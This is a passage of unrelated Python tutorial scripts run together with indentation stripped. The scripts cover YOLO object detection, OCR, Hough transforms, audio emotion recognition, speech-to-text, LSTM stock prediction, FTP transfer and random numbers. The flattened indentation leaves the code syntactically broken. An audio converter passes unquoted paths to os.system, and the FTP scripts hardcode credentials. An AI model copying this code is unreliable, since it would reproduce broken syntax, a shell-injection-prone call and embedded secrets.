# The coco.names file contains only one object class per line.
# Read the file line by line and save all the lines in a list.
lines = fp.readlines()
# Get the object class names
for line in lines:
# Make a copy of each line with any trailing whitespace removed
line = line.rstrip()
# Save the object class name into class_names
class_names.append(line)
return class_names
def print_objects(boxes, class_names):
print('Objects Found and Confidence Level:\n')
for i in range(len(boxes)):
box = boxes[i]
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%i. %s: %f' % (i + 1, class_names[cls_id], cls_conf))
def plot_boxes(img, boxes, class_names, plot_labels, color = None):
# Define a tensor used to set the colors of the bounding boxes
colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]])
# Define a function to set the colors of the bounding boxes
def get_color(c, x, max_val):
ratio = float(x) / max_val * 5
i = int(np.floor(ratio))
j = int(np.ceil(ratio))
ratio = ratio - i
r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
return int(r * 255)
# Get the width and height of the image
width = img.shape[1]
height = img.shape[0]
# Create a figure and plot the image
fig, a = plt.subplots(1,1)
a.imshow(img)
# Plot the bounding boxes and corresponding labels on top of the image
for i in range(len(boxes)):
# Get the ith bounding box
box = boxes[i]
# Get the (x,y) pixel coordinates of the lower-left and lower-right corners
# of the bounding box relative to the size of the image.
x1 = int(np.around((box[0] - box[2]/2.0) * width))
y1 = int(np.around((box[1] - box[3]/2.0) * height))
x2 = int(np.around((box[0] + box[2]/2.0) * width))
y2 = int(np.around((box[1] + box[3]/2.0) * height))
# Set the default rgb value to red
rgb = (1, 0, 0)
# Use the same color to plot the bounding boxes of the same object class
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes) / 255
green = get_color(1, offset, classes) / 255
blue = get_color(0, offset, classes) / 255
# If a color is given then set rgb to the given color instead
if color is None:
rgb = (red, green, blue)
else:
rgb = color
# Calculate the width and height of the bounding box relative to the size of the image.
width_x = x2 - x1
width_y = y1 - y2
# Set the postion and size of the bounding box. (x1, y2) is the pixel coordinate of the
# lower-left corner of the bounding box relative to the size of the image.
rect = patches.Rectangle((x1, y2),
width_x, width_y,
linewidth = 2,
edgecolor = rgb,
facecolor = 'none')
# Draw the bounding box on top of the image
a.add_patch(rect)
# If plot_labels = True then plot the corresponding label
if plot_labels:
# Create a string with the object class name and the corresponding object class probability
conf_tx = class_names[cls_id] + ': {:.1f}'.format(cls_conf)
# Define x and y offsets for the labels
lxc = (img.shape[1] * 0.266) / 100
lyc = (img.shape[0] * 1.180) / 100
# Draw the labels on top of the image
a.text(x1 + lxc, y1 - lyc, conf_tx, fontsize = 12, color = 'k',
bbox = dict(facecolor = rgb, edgecolor = rgb, alpha = 0.6))
plt.savefig("output.jpg")
plt.show()
import cv2
import matplotlib.pyplot as plt
from utils import *
from darknet import Darknet
# Set the NMS Threshold
score_threshold = 0.6
# Set the IoU threshold
iou_threshold = 0.4
cfg_file = "cfg/yolov3.cfg"
weight_file = "weights/yolov3.weights"
namesfile = "data/coco.names"
m = Darknet(cfg_file)
m.load_weights(weight_file)
class_names = load_class_names(namesfile)
# m.print_network()
original_image = cv2.imread("images/city_scene.jpg")
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
img = cv2.resize(original_image, (m.width, m.height))
# detect the objects
boxes = detect_objects(m, img, iou_threshold, score_threshold)
print(boxes[0])
print(boxes[1])
print(boxes[2])
# plot the image with the bounding boxes and corresponding object class labels
plot_boxes(original_image, boxes, class_names, plot_labels=True)
import cv2
import numpy as np
import time
import sys
import os
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
# the neural network configuration
config_path = "cfg/yolov3.cfg"
# the YOLO net weights file
weights_path = "weights/yolov3.weights"
# loading all the class labels (objects)
labels = open("data/coco.names").read().strip().split("\n")
# generating colors for each object for later plotting
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
# load the YOLO network
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
# path_name = "images/city_scene.jpg"
path_name = sys.argv[1]
image = cv2.imread(path_name)
file_name = os.path.basename(path_name)
filename, ext = file_name.split(".")
h, w = image.shape[:2]
# create 4D blob
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
# sets the blob as the input of the network
net.setInput(blob)
# get all the layer names
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# feed forward (inference) and get the network output
# measure how much it took in seconds
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print(f"Time took: {time_took:.2f}s")
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
# cv2.imshow("image", image)
# if cv2.waitKey(0) == ord("q"):
# pass
cv2.imwrite(filename + "_yolo3." + ext, image)
import pytesseract
import cv2
import sys
import matplotlib.pyplot as plt
from PIL import Image
# read the image using OpenCV
image = cv2.imread(sys.argv[1])
# make a copy of this image to draw in
image_copy = image.copy()
# the target word to search for
target_word = sys.argv[2]
# get all data from the image
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
# get all occurences of the that word
word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
for occ in word_occurences:
# extract the width, height, top and left position for that detected word
w = data["width"][occ]
h = data["height"][occ]
l = data["left"][occ]
t = data["top"][occ]
# define all the surrounding box points
p1 = (l, t)
p2 = (l + w, t)
p3 = (l + w, t + h)
p4 = (l, t + h)
# draw the 4 lines (rectangular)
image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
plt.imsave("all_dog_words.png", image_copy)
plt.imshow(image_copy)
plt.show()
import pytesseract
import cv2
import matplotlib.pyplot as plt
import sys
from PIL import Image
# read the image using OpenCV
# from the command line first argument
image = cv2.imread(sys.argv[1])
# or you can use Pillow
# image = Image.open(sys.argv[1])
# get the string
string = pytesseract.image_to_string(image)
# print it
print(string)
# get all data
# data = pytesseract.image_to_data(image)
# print(data)
import pytesseract
import cv2
import matplotlib.pyplot as plt
from PIL import Image
# the target word to search for
target_word = "your"
cap = cv2.VideoCapture(0)
while True:
# read the image from the cam
_, image = cap.read()
# make a copy of this image to draw in
image_copy = image.copy()
# get all data from the image
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
# print the data
print(data["text"])
# get all occurences of the that word
word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
for occ in word_occurences:
# extract the width, height, top and left position for that detected word
w = data["width"][occ]
h = data["height"][occ]
l = data["left"][occ]
t = data["top"][occ]
# define all the surrounding box points
p1 = (l, t)
p2 = (l + w, t)
p3 = (l + w, t + h)
p4 = (l, t + h)
# draw the 4 lines (rectangular)
image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
if cv2.waitKey(1) == ord("q"):
break
cv2.imshow("image_copy", image_copy)
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# load the image
img = cv2.imread(sys.argv[1])
# convert BGR to RGB to be suitable for showing using matplotlib library
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# make a copy of the original image
cimg = img.copy()
# convert image to grayscale
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# apply a blur using the median filter
img = cv2.medianBlur(img, 5)
# finds the circles in the grayscale image using the Hough transform
circles = cv2.HoughCircles(image=img, method=cv2.HOUGH_GRADIENT, dp=0.9,
minDist=80, param1=110, param2=39, maxRadius=70)
for co, i in enumerate(circles[0, :], start=1):
# draw the outer circle in green
cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle in red
cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
# print the number of circles detected
print("Number of circles detected:", co)
# save the image, convert to BGR to save with proper colors
# cv2.imwrite("coins_circles_detected.png", cimg)
# show the image
plt.imshow(cimg)
plt.show()
import numpy as np
import matplotlib.pyplot as plt
import cv2
cap = cv2.VideoCapture(0)
while True:
_, image = cap.read()
# convert to grayscale
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# perform edge detection
edges = cv2.Canny(grayscale, 30, 100)
# detect lines in the image using hough lines technique
lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
# iterate over the output lines and draw them
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(image, (x1, y1), (x2, y2), (255, 0, 0), 3)
cv2.line(edges, (x1, y1), (x2, y2), (255, 0, 0), 3)
# show images
cv2.imshow("image", image)
cv2.imshow("edges", edges)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import numpy as np
import matplotlib.pyplot as plt
import cv2
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to grayscale
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# perform edge detection
edges = cv2.Canny(grayscale, 30, 100)
# detect lines in the image using hough lines technique
lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
# iterate over the output lines and draw them
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(image, (x1, y1), (x2, y2), color=(20, 220, 20), thickness=3)
# show the image
plt.imshow(image)
plt.show()
"""
A utility script used for converting audio samples to be
suitable for feature extraction
"""
import os
def convert_audio(audio_path, target_path, remove=False):
"""This function sets the audio audio_path to:
- 16000Hz Sampling rate
- one audio channel ( mono )
Params:
audio_path (str): the path of audio wav file you want to convert
target_path (str): target path to save your new converted wav file
remove (bool): whether to remove the old file after converting
Note that this function requires ffmpeg installed in your system."""
os.system(f"ffmpeg -i {audio_path} -ac 1 -ar 16000 {target_path}")
# os.system(f"ffmpeg -i {audio_path} -ac 1 {target_path}")
if remove:
os.remove(audio_path)
def convert_audios(path, target_path, remove=False):
"""Converts a path of wav files to:
- 16000Hz Sampling rate
- one audio channel ( mono )
and then put them into a new folder called target_path
Params:
audio_path (str): the path of audio wav file you want to convert
target_path (str): target path to save your new converted wav file
remove (bool): whether to remove the old file after converting
Note that this function requires ffmpeg installed in your system."""
for dirpath, dirnames, filenames in os.walk(path):
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
target_dir = dirname.replace(path, target_path)
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
for dirpath, _, filenames in os.walk(path):
for filename in filenames:
file = os.path.join(dirpath, filename)
if file.endswith(".wav"):
# it is a wav file
target_file = file.replace(path, target_path)
convert_audio(file, target_file, remove=remove)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="""Convert ( compress ) wav files to 16MHz and mono audio channel ( 1 channel )
This utility helps for compressing wav files for training and testing""")
parser.add_argument("audio_path", help="Folder that contains wav files you want to convert")
parser.add_argument("target_path", help="Folder to save new wav files")
parser.add_argument("-r", "--remove", type=bool, help="Whether to remove the old wav file after converting", default=False)
args = parser.parse_args()
audio_path = args.audio_path
target_path = args.target_path
if os.path.isdir(audio_path):
if not os.path.isdir(target_path):
os.makedirs(target_path)
convert_audios(audio_path, target_path, remove=args.remove)
elif os.path.isfile(audio_path) and audio_path.endswith(".wav"):
if not target_path.endswith(".wav"):
target_path += ".wav"
convert_audio(audio_path, target_path, remove=args.remove)
else:
raise TypeError("The audio_path file you specified isn't appropriate for this operation")
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from utils import load_data
import os
import pickle
# load RAVDESS dataset
X_train, X_test, y_train, y_test = load_data(test_size=0.25)
# print some details
# number of samples in training data
print("[+] Number of training samples:", X_train.shape[0])
# number of samples in testing data
print("[+] Number of testing samples:", X_test.shape[0])
# number of features used
# this is a vector of features extracted
# using utils.extract_features() method
print("[+] Number of features:", X_train.shape[1])
# best model, determined by a grid search
model_params = {
'alpha': 0.01,
'batch_size': 256,
'epsilon': 1e-08,
'hidden_layer_sizes': (300,),
'learning_rate': 'adaptive',
'max_iter': 500,
}
# initialize Multi Layer Perceptron classifier
# with best parameters ( so far )
model = MLPClassifier(**model_params)
# train the model
print("[*] Training the model...")
model.fit(X_train, y_train)
# predict 25% of data to measure how good we are
y_pred = model.predict(X_test)
# calculate the accuracy
accuracy = accuracy_score(y_true=y_test, y_pred=y_pred)
print("Accuracy: {:.2f}%".format(accuracy*100))
# now we save the model
# make result directory if doesn't exist yet
if not os.path.isdir("result"):
os.mkdir("result")
pickle.dump(model, open("result/mlp_classifier.model", "wb"))
import pyaudio
import os
import wave
import pickle
from sys import byteorder
from array import array
from struct import pack
from sklearn.neural_network import MLPClassifier
from utils import extract_feature
THRESHOLD = 500
CHUNK_SIZE = 1024
FORMAT = pyaudio.paInt16
RATE = 16000
SILENCE = 30
def is_silent(snd_data):
"Returns 'True' if below the 'silent' threshold"
return max(snd_data) < THRESHOLD
def normalize(snd_data):
"Average the volume out"
MAXIMUM = 16384
times = float(MAXIMUM)/max(abs(i) for i in snd_data)
r = array('h')
for i in snd_data:
r.append(int(i*times))
return r
def trim(snd_data):
"Trim the blank spots at the start and end"
def _trim(snd_data):
snd_started = False
r = array('h')
for i in snd_data:
if not snd_started and abs(i)>THRESHOLD:
snd_started = True
r.append(i)
elif snd_started:
r.append(i)
return r
# Trim to the left
snd_data = _trim(snd_data)
# Trim to the right
snd_data.reverse()
snd_data = _trim(snd_data)
snd_data.reverse()
return snd_data
def add_silence(snd_data, seconds):
"Add silence to the start and end of 'snd_data' of length 'seconds' (float)"
r = array('h', [0 for i in range(int(seconds*RATE))])
r.extend(snd_data)
r.extend([0 for i in range(int(seconds*RATE))])
return r
def record():
"""
Record a word or words from the microphone and
return the data as an array of signed shorts.
Normalizes the audio, trims silence from the
start and end, and pads with 0.5 seconds of
blank sound to make sure VLC et al can play
it without getting chopped off.
"""
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT, channels=1, rate=RATE,
input=True, output=True,
frames_per_buffer=CHUNK_SIZE)
num_silent = 0
snd_started = False
r = array('h')
while 1:
# little endian, signed short
snd_data = array('h', stream.read(CHUNK_SIZE))
if byteorder == 'big':
snd_data.byteswap()
r.extend(snd_data)
silent = is_silent(snd_data)
if silent and snd_started:
num_silent += 1
elif not silent and not snd_started:
snd_started = True
if snd_started and num_silent > SILENCE:
break
sample_width = p.get_sample_size(FORMAT)
stream.stop_stream()
stream.close()
p.terminate()
r = normalize(r)
r = trim(r)
r = add_silence(r, 0.5)
return sample_width, r
def record_to_file(path):
"Records from the microphone and outputs the resulting data to 'path'"
sample_width, data = record()
data = pack('<' + ('h'*len(data)), *data)
wf = wave.open(path, 'wb')
wf.setnchannels(1)
wf.setsampwidth(sample_width)
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
if __name__ == "__main__":
# load the saved model (after training)
model = pickle.load(open("result/mlp_classifier.model", "rb"))
print("Please talk")
filename = "test.wav"
# record the file (start talking)
record_to_file(filename)
# extract features and reshape it
features = extract_feature(filename, mfcc=True, chroma=True, mel=True).reshape(1, -1)
# predict
result = model.predict(features)[0]
# show the result !
print("result:", result)
import soundfile
import numpy as np
import librosa
import glob
import os
from sklearn.model_selection import train_test_split
# all emotions on RAVDESS dataset
int2emotion = {
"01": "neutral",
"02": "calm",
"03": "happy",
"04": "sad",
"05": "angry",
"06": "fearful",
"07": "disgust",
"08": "surprised"
}
# we allow only these emotions
AVAILABLE_EMOTIONS = {
"angry",
"sad",
"neutral",
"happy"
}
def extract_feature(file_name, **kwargs):
"""
Extract feature from audio file file_name
Features supported:
- MFCC (mfcc)
- Chroma (chroma)
- MEL Spectrogram Frequency (mel)
- Contrast (contrast)
- Tonnetz (tonnetz)
e.g:
features = extract_feature(path, mel=True, mfcc=True)
"""
mfcc = kwargs.get("mfcc")
chroma = kwargs.get("chroma")
mel = kwargs.get("mel")
contrast = kwargs.get("contrast")
tonnetz = kwargs.get("tonnetz")
with soundfile.SoundFile(file_name) as sound_file:
X = sound_file.read(dtype="float32")
sample_rate = sound_file.samplerate
if chroma or contrast:
stft = np.abs(librosa.stft(X))
result = np.array([])
if mfcc:
mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T, axis=0)
result = np.hstack((result, mfccs))
if chroma:
chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)
result = np.hstack((result, chroma))
if mel:
mel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)
result = np.hstack((result, mel))
if contrast:
contrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate).T,axis=0)
result = np.hstack((result, contrast))
if tonnetz:
tonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X), sr=sample_rate).T,axis=0)
result = np.hstack((result, tonnetz))
return result
def load_data(test_size=0.2):
X, y = [], []
for file in glob.glob("data/Actor_*/*.wav"):
# get the base name of the audio file
basename = os.path.basename(file)
# get the emotion label
emotion = int2emotion[basename.split("-")[2]]
# we allow only AVAILABLE_EMOTIONS we set
if emotion not in AVAILABLE_EMOTIONS:
continue
# extract speech features
features = extract_feature(file, mfcc=True, chroma=True, mel=True)
# add to data
X.append(features)
y.append(emotion)
# split the data to training and testing and return it
return train_test_split(np.array(X), y, test_size=test_size, random_state=7)
import speech_recognition as sr
import sys
duration = int(sys.argv[1])
# initialize the recognizer
r = sr.Recognizer()
print("Please talk")
with sr.Microphone() as source:
# read the audio data from the default microphone
audio_data = r.record(source, duration=duration)
print("Recognizing...")
# convert speech to text
text = r.recognize_google(audio_data)
print(text)
import speech_recognition as sr
import sys
filename = sys.argv[1]
# initialize the recognizer
r = sr.Recognizer()
# open the file
with sr.AudioFile(filename) as source:
# listen for the data (load audio to memory)
audio_data = r.record(source)
# recognize (convert from speech to text)
text = r.recognize_google(audio_data)
print(text)
import os
import time
from tensorflow.keras.layers import LSTM
# Window size or the sequence length
N_STEPS = 100
# Lookup step, 1 is the next day
LOOKUP_STEP = 90
# test ratio size, 0.2 is 20%
TEST_SIZE = 0.2
# features to use
FEATURE_COLUMNS = ["adjclose", "volume", "open", "high", "low"]
# date now
date_now = time.strftime("%Y-%m-%d")
### model parameters
N_LAYERS = 3
# LSTM cell
CELL = LSTM
# 256 LSTM neurons
UNITS = 256
# 40% dropout
DROPOUT = 0.4
### training parameters
# mean squared error loss
LOSS = "mse"
OPTIMIZER = "rmsprop"
BATCH_SIZE = 64
EPOCHS = 300
# Apple stock market
ticker = "AAPL"
ticker_data_filename = os.path.join("data", f"{ticker}_{date_now}.csv")
# model name to save
model_name = f"{date_now}_{ticker}-{LOSS}-{CELL.__name__}-seq-{N_STEPS}-step-{LOOKUP_STEP}-layers-{N_LAYERS}-units-{UNITS}"
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from yahoo_fin import stock_info as si
from collections import deque
import numpy as np
import pandas as pd
import random
def load_data(ticker, n_steps=50, scale=True, shuffle=True, lookup_step=1,
test_size=0.2, feature_columns=['adjclose', 'volume', 'open', 'high', 'low']):
"""
Loads data from Yahoo Finance source, as well as scaling, shuffling, normalizing and splitting.
Params:
ticker (str/pd.DataFrame): the ticker you want to load, examples include AAPL, TESL, etc.
n_steps (int): the historical sequence length (i.e window size) used to predict, default is 50
scale (bool): whether to scale prices from 0 to 1, default is True
shuffle (bool): whether to shuffle the data, default is True
lookup_step (int): the future lookup step to predict, default is 1 (e.g next day)
test_size (float): ratio for test data, default is 0.2 (20% testing data)
feature_columns (list): the list of features to use to feed into the model, default is everything grabbed from yahoo_fin
"""
# see if ticker is already a loaded stock from yahoo finance
if isinstance(ticker, str):
# load it from yahoo_fin library
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
# already loaded, use it directly
df = ticker
else:
raise TypeError("ticker can be either a str or a pd.DataFrame instances")
# this will contain all the elements we want to return from this function
result = {}
# we will also return the original dataframe itself
result['df'] = df.copy()
# make sure that the passed feature_columns exist in the dataframe
for col in feature_columns:
assert col in df.columns
if scale:
column_scaler = {}
# scale the data (prices) from 0 to 1
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# add the MinMaxScaler instances to the result returned
result["column_scaler"] = column_scaler
# add the target column (label) by shifting by lookup_step
df['future'] = df['adjclose'].shift(-lookup_step)
# last lookup_step columns contains NaN in future column
# get them before droping NaNs
last_sequence = np.array(df[feature_columns].tail(lookup_step))
# drop NaNs
df.dropna(inplace=True)
sequence_data = []
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df['future'].values):
sequences.append(entry)
if len(sequences) == n_steps:
sequence_data.append([np.array(sequences), target])
# get the last sequence by appending the last n_step sequence with lookup_step sequence
# for instance, if n_steps=50 and lookup_step=10, last_sequence should be of 59 (that is 50+10-1) length
# this last_sequence will be used to predict in future dates that are not available in the dataset
last_sequence = list(sequences) + list(last_sequence)
# shift the last sequence by -1
last_sequence = np.array(pd.DataFrame(last_sequence).shift(-1).dropna())
# add to result
result['last_sequence'] = last_sequence
# construct the X's and y's
X, y = [], []
for seq, target in sequence_data:
X.append(seq)
y.append(target)
# convert to numpy arrays
X = np.array(X)
y = np.array(y)
# reshape X to fit the neural network
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# split the dataset
result["X_train"], result["X_test"], result["y_train"], result["y_test"] = train_test_split(X, y,
test_size=test_size, shuffle=shuffle)
# return the result
return result
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3,
loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
elif i == n_layers - 1:
# last layer
model.add(cell(units, return_sequences=False))
else:
# hidden layers
model.add(cell(units, return_sequences=True))
# add dropout after each layer
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
from stock_prediction import create_model, load_data, np
from parameters import *
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
def plot_graph(model, data):
y_test = data["y_test"]
X_test = data["X_test"]
y_pred = model.predict(X_test)
y_test = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(np.expand_dims(y_test, axis=0)))
y_pred = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(y_pred))
plt.plot(y_test[-200:], c='b')
plt.plot(y_pred[-200:], c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def get_accuracy(model, data):
y_test = data["y_test"]
X_test = data["X_test"]
y_pred = model.predict(X_test)
y_test = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(np.expand_dims(y_test, axis=0)))
y_pred = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(y_pred))
y_pred = list(map(lambda current, future: int(float(future) > float(current)), y_test[:-LOOKUP_STEP], y_pred[LOOKUP_STEP:]))
y_test = list(map(lambda current, future: int(float(future) > float(current)), y_test[:-LOOKUP_STEP], y_test[LOOKUP_STEP:]))
return accuracy_score(y_test, y_pred)
def predict(model, data, classification=False):
# retrieve the last sequence from data
last_sequence = data["last_sequence"][:N_STEPS]
# retrieve the column scalers
column_scaler = data["column_scaler"]
# reshape the last sequence
last_sequence = last_sequence.reshape((last_sequence.shape[1], last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
# get the prediction (scaled from 0 to 1)
prediction = model.predict(last_sequence)
# get the price (by inverting the scaling)
predicted_price = column_scaler["adjclose"].inverse_transform(prediction)[0][0]
return predicted_price
# load the data
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE,
feature_columns=FEATURE_COLUMNS, shuffle=False)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
dropout=DROPOUT, optimizer=OPTIMIZER)
model_path = os.path.join("results", model_name) + ".h5"
model.load_weights(model_path)
# evaluate the model
mse, mae = model.evaluate(data["X_test"], data["y_test"])
# calculate the mean absolute error (inverse scaling)
mean_absolute_error = data["column_scaler"]["adjclose"].inverse_transform(mae.reshape(1, -1))[0][0]
print("Mean Absolute Error:", mean_absolute_error)
# predict the future price
future_price = predict(model, data)
print(f"Future price after {LOOKUP_STEP} days is {future_price:.2f}")
print("Accuracy Score:", get_accuracy(model, data))
plot_graph(model, data)
from stock_prediction import create_model, load_data
from tensorflow.keras.layers import LSTM
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import os
import pandas as pd
from parameters import *
# create these folders if they does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# load the data
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE, feature_columns=FEATURE_COLUMNS)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
dropout=DROPOUT, optimizer=OPTIMIZER)
# some tensorflow callbacks
checkpointer = ModelCheckpoint(os.path.join("results", model_name), save_weights_only=True, save_best_only=True, verbose=1)
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[checkpointer, tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
import ftplib
FTP_HOST = "ftp.dlptest.com"
FTP_USER = "dlpuserdlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# the name of file you want to download from the FTP server
filename = "some_file.txt"
with open(filename, "wb") as file:
# use FTP's RETR command to download the file
ftp.retrbinary(f"RETR {filename}", file.write)
# quit and close the connection
ftp.quit()
import ftplib
# FTP server credentials
FTP_HOST = "ftp.dlptest.com"
FTP_USER = "dlpuserdlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# local file name you want to upload
filename = "some_file.txt"
with open(filename, "rb") as file:
# use FTP's STOR command to upload the file
ftp.storbinary(f"STOR {filename}", file)
# list current files & directories
ftp.dir()
# quit and close the connection
ftp.quit()
import random
import os
import string
import secrets
# generate random integer between a and b (including a and b)
randint = random.randint(1, 500)
print("randint:", randint)
# generate random integer from range
randrange = random.randrange(0, 500, 5)
print("randrange:", randrange)
# get a random element from this list
choice = random.choice(["hello", "hi", "welcome", "bye", "see you"])
print("choice:", choice)
# get 5 random elements from 0 to 1000
choices = random.choices(range(1000), k=5)
print("choices:", choices)
# generate a random floating point number from 0.0 <= x <= 1.0
randfloat = random.random()
print("randfloat between 0.0 and 1.0:", randfloat)
# generate a random floating point number such that a <= x <= b
randfloat = random.uniform(5, 10)
